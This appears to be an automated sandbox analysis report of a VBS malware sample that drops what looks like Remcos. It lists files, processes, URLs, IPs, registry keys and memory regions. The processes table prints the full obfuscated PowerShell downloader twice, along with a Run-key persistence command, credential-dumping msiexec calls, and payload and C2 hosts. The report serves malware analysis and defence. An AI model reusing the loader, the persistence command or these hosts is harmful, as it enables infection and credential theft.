Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Order_MG2027176.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
|
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks,
0x1 compression
|
dropped
|
||
|
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3rcjls1f.cyv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bidlgidu.ijd.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pkvg4rgo.t0n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tpcgigft.qcv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvC6D8.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x7d065266, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\hywcyvebel
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Cobblerism.Ace
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_MG2027176.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping gormezl_6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau
#>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI;
function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza;
for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function
Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes
' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo
nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao
Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes
'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat
biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF
rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending
(Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte
k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes
',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK
geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn
nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA
juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC
VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S
mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG
.xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO
prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg
oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe
d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir
hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k
Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending
(Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS
HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while
(!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS
oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai
Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe
e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5
Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo
ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik%
rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending
(Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr
angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve
');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss
istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr
AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes
'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin
Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn
eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending
(Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara
Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta
,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau
#>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI;
function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza;
for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function
Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes
' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo
nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao
Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes
'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat
biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF
rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending
(Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte
k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes
',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK
geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn
nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA
juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC
VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S
mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG
.xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO
prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg
oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe
d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir
hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k
Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending
(Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS
HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while
(!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS
oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai
Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe
e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5
Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo
ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik%
rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending
(Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr
angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve
');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss
istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr
AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes
'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin
Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn
eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending
(Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara
Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta
,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\hywcyvebel"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kscvygpustapv"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uuhnryzwobsuytie"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ
/d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle
1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
|
There are 5 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
renajazinw.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
http://www.microsoft.co
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://go.micd
|
unknown
|
||
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
||
|
https://www.google.com
|
unknown
|
||
|
https://totoplast.com/r5/JfcplHmBpoWXVfH37.bin
|
192.185.113.96
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://totoplast.com
|
unknown
|
||
|
https://totoplast.com/r5/Costiform.ocx
|
192.185.113.96
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://totoplast.com/r5/Costiform.ocxXRtl
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://totoplast.com
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 17 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
gormezl_6777.6777.6777.677e
|
unknown
|
|
|
|
renajazinw.duckdns.org
|
unknown
|
|
|
|
totoplast.com
|
192.185.113.96
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.157.163.135
|
unknown
|
Sweden
|
|
|
|
192.185.113.96
|
totoplast.com
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Silently
|
lyspen
|
||
|
HKEY_CURRENT_USER\Environment
|
Ankomststationen
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-N1P6UN
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-N1P6UN
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-N1P6UN
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Leavy
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
B184000
|
direct allocation
|
page execute and read and write
|
|
|
|
79E000
|
heap
|
page read and write
|
|
|
|
7B9000
|
heap
|
page read and write
|
|
|
|
7B9000
|
heap
|
page read and write
|
|
|
|
5761000
|
trusted library allocation
|
page read and write
|
|
|
|
7A6000
|
heap
|
page read and write
|
|
|
|
196A8183000
|
trusted library allocation
|
page read and write
|
|
|
|
14F000
|
stack
|
page read and write
|
|
|
|
7A7000
|
heap
|
page read and write
|
|
|
|
8230000
|
direct allocation
|
page execute and read and write
|
|
|
|
68C0000
|
direct allocation
|
page read and write
|
||
|
2364A000
|
heap
|
page read and write
|
||
|
7FFB4AEA0000
|
trusted library allocation
|
page read and write
|
||
|
92B000
|
heap
|
page read and write
|
||
|
70D0000
|
trusted library allocation
|
page read and write
|
||
|
807000
|
heap
|
page read and write
|
||
|
196B078B000
|
heap
|
page read and write
|
||
|
4921000
|
heap
|
page read and write
|
||
|
7FFB4AFA0000
|
trusted library allocation
|
page read and write
|
||
|
2343D000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
68F0000
|
direct allocation
|
page read and write
|
||
|
7070000
|
trusted library allocation
|
page read and write
|
||
|
24A7C9EB000
|
heap
|
page read and write
|
||
|
8160000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F42000
|
heap
|
page read and write
|
||
|
24A7E7C2000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
7FFB4ADCA000
|
trusted library allocation
|
page read and write
|
||
|
24A7C73D000
|
heap
|
page read and write
|
||
|
5CAF43B000
|
stack
|
page read and write
|
||
|
7FFB4AF40000
|
trusted library allocation
|
page read and write
|
||
|
440E000
|
stack
|
page read and write
|
||
|
560000
|
direct allocation
|
page read and write
|
||
|
196B0450000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
5CAEE73000
|
stack
|
page read and write
|
||
|
231EF000
|
stack
|
page read and write
|
||
|
4F2B000
|
heap
|
page read and write
|
||
|
494E000
|
heap
|
page read and write
|
||
|
8F8000
|
heap
|
page read and write
|
||
|
196965CB000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
C584000
|
direct allocation
|
page execute and read and write
|
||
|
24A7E511000
|
heap
|
page read and write
|
||
|
315A000
|
heap
|
page read and write
|
||
|
54A4000
|
heap
|
page read and write
|
||
|
8AC000
|
stack
|
page read and write
|
||
|
24A7E52C000
|
heap
|
page read and write
|
||
|
AA4000
|
heap
|
page read and write
|
||
|
816000
|
heap
|
page read and write
|
||
|
7E9E000
|
stack
|
page read and write
|
||
|
24A7E511000
|
heap
|
page read and write
|
||
|
5CAF1FE000
|
stack
|
page read and write
|
||
|
4581000
|
trusted library allocation
|
page read and write
|
||
|
814000
|
heap
|
page read and write
|
||
|
7FFB4ADF5000
|
trusted library allocation
|
page read and write
|
||
|
8CC000
|
stack
|
page read and write
|
||
|
7EDC000
|
stack
|
page read and write
|
||
|
4935000
|
heap
|
page read and write
|
||
|
4F86000
|
heap
|
page read and write
|
||
|
7C10000
|
trusted library allocation
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
4F28000
|
heap
|
page read and write
|
||
|
6EE0000
|
heap
|
page read and write
|
||
|
1969858D000
|
trusted library allocation
|
page read and write
|
||
|
23381000
|
heap
|
page read and write
|
||
|
24A7E540000
|
heap
|
page read and write
|
||
|
24A7C715000
|
heap
|
page read and write
|
||
|
19699E8C000
|
trusted library allocation
|
page read and write
|
||
|
4F37000
|
heap
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
558B000
|
trusted library allocation
|
page read and write
|
||
|
944000
|
heap
|
page read and write
|
||
|
6A90000
|
heap
|
page read and write
|
||
|
42CE000
|
stack
|
page read and write
|
||
|
232BB000
|
unclassified section
|
page execute and read and write
|
||
|
5CAF17F000
|
stack
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
816000
|
heap
|
page read and write
|
||
|
24A7E723000
|
heap
|
page read and write
|
||
|
4F3F000
|
heap
|
page read and write
|
||
|
4570000
|
heap
|
page execute and read and write
|
||
|
24A7E65C000
|
heap
|
page read and write
|
||
|
22DB0000
|
direct allocation
|
page read and write
|
||
|
4F46000
|
heap
|
